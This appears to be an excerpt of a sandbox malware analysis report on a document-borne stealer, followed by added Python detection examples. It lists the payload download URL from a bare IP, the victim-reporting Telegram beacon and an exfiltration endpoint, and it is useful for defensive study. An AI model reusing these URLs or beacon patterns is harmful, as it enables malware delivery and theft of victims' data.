Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80

Networking

Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49163
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:25:03 GMTContent-Type: application/x-msdos-programContent-Length: 755712Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 01:58:38 GMTETag: "b8800-625a80a540932"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 91 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6c 0b 00 00 1a 00 00 00 00 00 00 a2 8a 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8a 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 6a 0b 00 00 20 00 00 00 6c 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 a0 0b 00 00 18 00 00 00 6e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 8a 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 80 b1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05
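The two ET MALWARE alerts above (2022050/2022051) describe exactly this exchange: a client with an MSIE-compatible User-Agent fetches a file from a bare IP and receives a body that begins with the MZ magic under an executable Content-Type. The ETPRO EXPLOIT EMF alert on the same stream fired inside that PE download, so it should be verified against the file rather than read as a second exploit. The Python below is an added example, not part of the Joe Sandbox report or of the Emerging Threats rules, that reproduces the core check on a constructed request/response pair modelled on the capture (headers abbreviated, body cut to the first 16 bytes of the DOS header); the EXE_CONTENT_TYPES set and the indicator names are this example's own assumptions.

```python
"""Flag an HTTP transaction that delivers a PE file from a bare-IP host.

Added example, not part of the Joe Sandbox report. It applies the idea
behind the "Likely Evil EXE download from dotted Quad" alerts to a
constructed request/response pair modelled on the capture above.
"""
import ipaddress

# Constructed sample, not the raw capture: headers are abbreviated and the
# body is cut to 16 bytes although Content-Length still says 755712.
SAMPLE_REQUEST = (
    b"GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
    b"Host: 87.120.84.38\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.26.2\r\n"
    b"Content-Type: application/x-msdos-program\r\n"
    b"Content-Length: 755712\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)

# Content-Types commonly seen on raw executables (assumed list).
EXE_CONTENT_TYPES = {
    "application/x-msdos-program",
    "application/x-dosexec",
    "application/x-msdownload",
}


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return lines[0].decode(errors="replace"), headers, body


def is_dotted_quad(host: str) -> bool:
    """True when the Host header is a bare IPv4 literal (optional :port)."""
    try:
        ipaddress.IPv4Address(host.split(":", 1)[0])
        return True
    except ValueError:
        return False


def assess_download(request: bytes, response: bytes) -> dict:
    """Collect the indicators that make a transaction look like a malware drop.

    The core of the alert is an MZ body served by an IP-literal host; the
    remaining fields raise confidence and help an analyst triage the hit.
    """
    req_line, req_hdr, _ = parse_http(request)
    _, resp_hdr, body = parse_http(response)
    path = req_line.split(" ")[1] if " " in req_line else ""
    indicators = {
        "host_is_ip_literal": is_dotted_quad(req_hdr.get("host", "")),
        "pe_magic": body[:2] == b"MZ",
        "path_ends_in_exe": path.lower().endswith(".exe"),
        "exe_like_content_type": resp_hdr.get("content-type", "").lower() in EXE_CONTENT_TYPES,
        # IE-compatibility string of the kind MSXML/WinHTTP clients send.
        "msxml_style_ua": req_hdr.get("user-agent", "").startswith("Mozilla/4.0 (compatible; MSIE"),
    }
    indicators["verdict"] = indicators["host_is_ip_literal"] and indicators["pe_magic"]
    return indicators


if __name__ == "__main__":
    for key, value in assess_download(SAMPLE_REQUEST, SAMPLE_RESPONSE).items():
        print(f"{key:24} {value}")
```

The verdict deliberately rests on only two fields (IP-literal host plus MZ magic) because the attacker controls the User-Agent, the path and the Content-Type; the other indicators are kept for triage, not for the decision.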
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
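The requests above are the stealer's beacon in order: checkip.dyndns.org for the public IP, reallyfreegeoip.org/xml/<ip> for the country, then a Telegram Bot API sendMessage whose text carries the hostname, timestamp and country (the bot token and chat_id are empty in this capture, so the URL reads /bot/sendMessage?chat_id=&text=...). The Python below is an added example, not part of the Joe Sandbox report: it walks constructed proxy log lines in a (timestamp, client, method, host, path) layout assumed for the example, decodes the sendMessage text, and reports each Telegram beacon together with the recon stages the same client performed beforehand.

```python
"""Spot the IP-check -> geoip -> Telegram sendMessage sequence in proxy logs.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is
constructed to mirror the requests captured above; its field layout
(timestamp, client, method, host, path) is an assumption, so adapt
parse_line to the real proxy format. The bot token and chat_id are empty
here exactly as the report shows them.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed log: the first three lines mirror the capture, the last two
# are benign noise from another client (a getMe call is not the beacon).
SAMPLE_LOG = """\
2024-10-31T04:16:20Z 192.168.2.22 GET checkip.dyndns.org /
2024-10-31T04:16:21Z 192.168.2.22 GET reallyfreegeoip.org /xml/173.254.250.78
2024-10-31T04:16:24Z 192.168.2.22 GET api.telegram.org /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
2024-10-31T04:17:00Z 192.168.2.40 GET www.example.com /index.html
2024-10-31T04:17:05Z 192.168.2.40 GET api.telegram.org /bot/getMe
"""

# Hosts the stealer contacts to learn the victim's public IP and country.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}


def parse_line(line: str) -> dict:
    """Split one log line of the assumed layout into its fields."""
    ts, client, method, host, path = line.split(" ", 4)
    return {"ts": ts, "client": client, "method": method, "host": host, "path": path}


def telegram_beacon_fields(path: str):
    """Decode a Bot API sendMessage call into the key/value lines of its text.

    Returns None for any other Bot API method.
    """
    url = urlparse(path)
    if not (url.path.startswith("/bot") and url.path.endswith("/sendMessage")):
        return None
    text = parse_qs(url.query).get("text", [""])[0]
    fields = {}
    for part in text.splitlines():
        key, sep, value = part.partition(":")
        if sep:  # lines without a colon (the "[ ... ]" banner) are dropped
            fields[key.strip()] = value.strip()
    return fields


def find_exfil_chains(log_text: str) -> list:
    """Per client, report each Telegram beacon with the recon stages seen before it."""
    stages_by_client = defaultdict(set)
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev["host"] in IP_CHECK_HOSTS:
            stages_by_client[ev["client"]].add("ipcheck")
        elif ev["host"] in GEOIP_HOSTS:
            stages_by_client[ev["client"]].add("geoip")
        elif ev["host"] == "api.telegram.org":
            fields = telegram_beacon_fields(ev["path"])
            if fields is None:
                continue  # other Bot API calls are not this beacon
            stages = stages_by_client[ev["client"]]
            hits.append({
                "client": ev["client"],
                "ts": ev["ts"],
                "recon_stages": sorted(stages),
                "full_chain": {"ipcheck", "geoip"} <= stages,
                "beacon": fields,
            })
    return hits


if __name__ == "__main__":
    for hit in find_exfil_chains(SAMPLE_LOG):
        print(hit)
```

In production the Telegram leg is usually TLS, so the path is only visible on an intercepting proxy; without one, the DNS/SNI sequence checkip -> geoip -> api.telegram.org from a non-browser process is still the detection, and the decoded text is what you hand to the incident owner, since it names the affected host.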
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: SHARCOM-ASBG SHARCOM-ASBG
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B82D526-DA5E-48B6-9927-FFCE89E887B8}.tmp Jump to behavior
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:25:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.392546083.000000000061A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe7j
Source: EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exej
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exettC:
